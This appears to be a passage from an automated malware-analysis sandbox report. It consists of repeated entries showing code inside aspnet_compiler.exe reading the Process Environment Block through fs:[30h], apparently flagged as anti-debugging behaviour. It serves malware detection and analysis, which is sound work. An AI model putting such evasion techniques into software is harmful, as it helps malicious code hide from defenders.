          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01533A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01528A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01554A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01554A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01537D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01553D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01593540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015C3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0159A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01596CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B73D mov eax, dword ptr fs:[00000030h]
